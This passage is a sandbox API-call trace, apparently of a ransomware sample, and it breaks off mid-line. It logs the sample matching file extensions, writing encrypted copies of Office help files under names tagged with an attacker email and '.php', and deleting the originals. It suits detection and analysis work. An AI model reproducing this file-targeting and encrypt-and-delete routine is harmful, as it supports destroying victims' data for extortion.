[0254.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61 [0254.144] lstrlenW (lpString=".zip") returned 4 [0254.144] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0254.144] lstrlenW (lpString=".rar") returned 4 [0254.144] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0254.144] lstrlenW (lpString=".bz2") returned 4 [0254.144] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0254.144] lstrlenW (lpString=".7z") returned 3 [0254.144] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0254.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61 [0254.144] lstrlenW (lpString=".dbf") returned 4 [0254.144] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0254.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61 [0254.144] lstrlenW (lpString=".1cd") returned 4 [0254.144] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0254.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61 [0254.145] lstrlenW (lpString=".jpg") returned 4 [0254.145] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0254.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61 [0254.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61 [0254.145] lstrlenW (lpString=".doc") returned 4 [0254.145] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0254.145] lstrlenW (lpString=".docx") returned 5 [0254.145] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0254.145] lstrlenW (lpString=".pdf") returned 4 [0254.145] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0254.145] lstrlenW (lpString=".xls") returned 4 [0254.145] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0254.145] lstrlenW (lpString=".xlsx") returned 5 [0254.145] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0254.145] lstrlenW (lpString=".ppt") returned 4 [0254.145] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0254.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61 [0254.145] lstrlenW (lpString=".zip") returned 4 [0254.145] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0254.145] lstrlenW (lpString=".rar") returned 4 [0254.145] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0254.145] lstrlenW (lpString=".bz2") returned 4 [0254.145] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0254.145] lstrlenW (lpString=".7z") returned 3 [0254.145] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0254.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61 [0254.145] lstrlenW (lpString=".dbf") returned 4 [0254.145] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0254.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61 [0254.145] lstrlenW (lpString=".1cd") returned 4 [0254.145] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0254.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61 [0254.146] lstrlenW (lpString=".jpg") returned 4 [0254.146] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0254.146] lstrcmpiW (lpString1=".HXK", lpString2=".php") returned -1 [0254.146] lstrlenW (lpString="MSOUC_F_COL.HXK") returned 15 [0254.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0254.146] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=114) returned 1 [0254.146] CloseHandle (hObject=0x38c) returned 1 [0254.146] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_f_col.hxk")) returned 0x20 [0254.146] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_f_col.hxk.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0254.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0254.146] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.146] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_f_col.hxk.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0254.147] GetLastError () returned 0x0 [0254.147] ReadFile (in: hFile=0x38c, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x72, lpOverlapped=0x0) returned 1 [0254.148] WriteFile (in: hFile=0x3a4, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x80, lpOverlapped=0x0) returned 1 [0254.149] ReadFile (in: hFile=0x38c, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0254.149] WriteFile (in: hFile=0x3a4, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0254.149] SetEndOfFile (hFile=0x3a4) returned 1 [0254.149] CloseHandle (hObject=0x3a4) returned 1 [0254.149] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.149] SetEndOfFile (hFile=0x38c) returned 1 [0254.151] CloseHandle (hObject=0x38c) returned 1 [0254.151] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0254.151] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_f_col.hxk")) returned 1 [0254.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63 [0254.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63 [0254.152] lstrlenW (lpString=".doc") returned 4 [0254.152] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0254.152] lstrlenW (lpString=".docx") returned 5 [0254.152] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0254.152] lstrlenW (lpString=".pdf") returned 4 [0254.152] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0254.152] lstrlenW (lpString=".xls") returned 4 [0254.152] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0254.152] lstrlenW (lpString=".xlsx") returned 5 [0254.152] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0254.152] lstrlenW (lpString=".ppt") returned 4 [0254.152] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0254.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63 [0254.152] lstrlenW (lpString=".zip") returned 4 [0254.152] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0254.152] lstrlenW (lpString=".rar") returned 4 [0254.152] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0254.152] lstrlenW (lpString=".bz2") returned 4 [0254.152] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0254.152] lstrlenW (lpString=".7z") returned 3 [0254.152] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0254.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63 [0254.152] lstrlenW (lpString=".dbf") returned 4 [0254.152] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0254.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63 [0254.152] lstrlenW (lpString=".1cd") returned 4 [0254.152] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0254.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63 [0254.152] lstrlenW (lpString=".jpg") returned 4 [0254.152] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0254.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63 [0254.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63 [0254.153] lstrlenW (lpString=".doc") returned 4 [0254.153] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0254.153] lstrlenW (lpString=".docx") returned 5 [0254.153] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0254.153] lstrlenW (lpString=".pdf") returned 4 [0254.153] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0254.153] lstrlenW (lpString=".xls") returned 4 [0254.153] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0254.153] lstrlenW (lpString=".xlsx") returned 5 [0254.153] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0254.153] lstrlenW (lpString=".ppt") returned 4 [0254.153] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0254.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63 [0254.153] lstrlenW (lpString=".zip") returned 4 [0254.153] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0254.153] lstrlenW (lpString=".rar") returned 4 [0254.153] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0254.153] lstrlenW (lpString=".bz2") returned 4 [0254.153] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0254.153] lstrlenW (lpString=".7z") returned 3 [0254.153] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0254.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63 [0254.153] lstrlenW (lpString=".dbf") returned 4 [0254.153] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0254.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63 [0254.153] lstrlenW (lpString=".1cd") returned 4 [0254.153] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0254.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63 [0254.153] lstrlenW (lpString=".jpg") returned 4 [0254.153] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0254.154] lstrcmpiW (lpString1=".HXK", lpString2=".php") returned -1 [0254.154] lstrlenW (lpString="MSOUC_K_COL.HXK") returned 15 [0254.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0254.154] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=113) returned 1 [0254.154] CloseHandle (hObject=0x38c) returned 1 [0254.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_k_col.hxk")) returned 0x20 [0254.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_k_col.hxk.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0254.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0254.154] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.154] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_k_col.hxk.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0254.155] GetLastError () returned 0x0 [0254.155] ReadFile (in: hFile=0x38c, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x71, lpOverlapped=0x0) returned 1 [0254.156] WriteFile (in: hFile=0x3a4, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x80, lpOverlapped=0x0) returned 1 [0254.157] ReadFile (in: hFile=0x38c, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0254.157] WriteFile (in: hFile=0x3a4, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0254.157] SetEndOfFile (hFile=0x3a4) returned 1 [0254.157] CloseHandle (hObject=0x3a4) returned 1 [0254.157] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.157] SetEndOfFile (hFile=0x38c) returned 1 [0254.159] CloseHandle (hObject=0x38c) returned 1 [0254.159] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0254.159] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_k_col.hxk")) returned 1 [0254.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63 [0254.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63 [0254.159] lstrlenW (lpString=".doc") returned 4 [0254.159] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0254.159] lstrlenW (lpString=".docx") returned 5 [0254.159] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0254.160] lstrlenW (lpString=".pdf") returned 4 [0254.160] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0254.160] lstrlenW (lpString=".xls") returned 4 [0254.160] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0254.160] lstrlenW (lpString=".xlsx") returned 5 [0254.160] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0254.160] lstrlenW (lpString=".ppt") returned 4 [0254.160] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0254.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63 [0254.160] lstrlenW (lpString=".zip") returned 4 [0254.160] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0254.160] lstrlenW (lpString=".rar") returned 4 [0254.160] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0254.160] lstrlenW (lpString=".bz2") returned 4 [0254.160] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0254.160] lstrlenW (lpString=".7z") returned 3 [0254.160] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0254.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63 [0254.160] lstrlenW (lpString=".dbf") returned 4 [0254.160] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0254.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63 [0254.160] lstrlenW (lpString=".1cd") returned 4 [0254.160] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0254.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63 [0254.160] lstrlenW (lpString=".jpg") returned 4 [0254.160] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0254.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63 [0254.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63 [0254.160] lstrlenW (lpString=".doc") returned 4 [0254.160] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0254.160] lstrlenW (lpString=".docx") returned 5 [0254.160] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0254.160] lstrlenW (lpString=".pdf") returned 4 [0254.160] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0254.161] lstrlenW (lpString=".xls") returned 4 [0254.161] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0254.161] lstrlenW (lpString=".xlsx") returned 5 [0254.161] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0254.161] lstrlenW (lpString=".ppt") returned 4 [0254.161] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0254.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63 [0254.161] lstrlenW (lpString=".zip") returned 4 [0254.161] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0254.161] lstrlenW (lpString=".rar") returned 4 [0254.161] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0254.161] lstrlenW (lpString=".bz2") returned 4 [0254.161] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0254.161] lstrlenW (lpString=".7z") returned 3 [0254.161] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0254.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63 [0254.161] lstrlenW (lpString=".dbf") returned 4 [0254.161] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0254.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63 [0254.161] lstrlenW (lpString=".1cd") returned 4 [0254.161] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0254.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63 [0254.161] lstrlenW (lpString=".jpg") returned 4 [0254.161] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0254.161] lstrcmpiW (lpString1=".HXS", lpString2=".php") returned -1 [0254.161] lstrlenW (lpString="MSPUB.DEV.HXS") returned 13 [0254.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0254.162] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=4750792) returned 1 [0254.162] CloseHandle (hObject=0x38c) returned 1 [0254.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev.hxs")) returned 0x20 [0254.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev.hxs.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0254.162] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev.hxs.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0254.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61 [0254.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61 [0254.162] lstrlenW (lpString=".doc") returned 4 [0254.162] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1 [0254.162] lstrlenW (lpString=".docx") returned 5 [0254.162] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1 [0254.162] lstrlenW (lpString=".pdf") returned 4 [0254.162] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1 [0254.162] lstrlenW (lpString=".xls") returned 4 [0254.162] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1 [0254.162] lstrlenW (lpString=".xlsx") returned 5 [0254.162] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1 [0254.162] lstrlenW (lpString=".ppt") returned 4 [0254.162] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1 [0254.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61 [0254.162] lstrlenW (lpString=".zip") returned 4 [0254.163] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1 [0254.163] lstrlenW (lpString=".rar") returned 4 [0254.163] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1 [0254.163] lstrlenW (lpString=".bz2") returned 4 [0254.163] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1 [0254.163] lstrlenW (lpString=".7z") returned 3 [0254.163] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1 [0254.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61 [0254.163] lstrlenW (lpString=".dbf") returned 4 [0254.163] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1 [0254.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61 [0254.163] lstrlenW (lpString=".1cd") returned 4 [0254.163] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1 [0254.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61 [0254.163] lstrlenW (lpString=".jpg") returned 4 [0254.163] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1 [0254.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61 [0254.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61 [0254.163] lstrlenW (lpString=".doc") returned 4 [0254.163] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1 [0254.163] lstrlenW (lpString=".docx") returned 5 [0254.163] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1 [0254.163] lstrlenW (lpString=".pdf") returned 4 [0254.163] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1 [0254.163] lstrlenW (lpString=".xls") returned 4 [0254.163] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1 [0254.163] lstrlenW (lpString=".xlsx") returned 5 [0254.163] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1 [0254.163] lstrlenW (lpString=".ppt") returned 4 [0254.163] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1 [0254.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61 [0254.163] lstrlenW (lpString=".zip") returned 4 [0254.163] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1 [0254.163] lstrlenW (lpString=".rar") returned 4 [0254.164] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1 [0254.164] lstrlenW (lpString=".bz2") returned 4 [0254.164] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1 [0254.164] lstrlenW (lpString=".7z") returned 3 [0254.164] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1 [0254.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61 [0254.164] lstrlenW (lpString=".dbf") returned 4 [0254.164] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1 [0254.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61 [0254.164] lstrlenW (lpString=".1cd") returned 4 [0254.164] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1 [0254.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61 [0254.164] lstrlenW (lpString=".jpg") returned 4 [0254.164] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 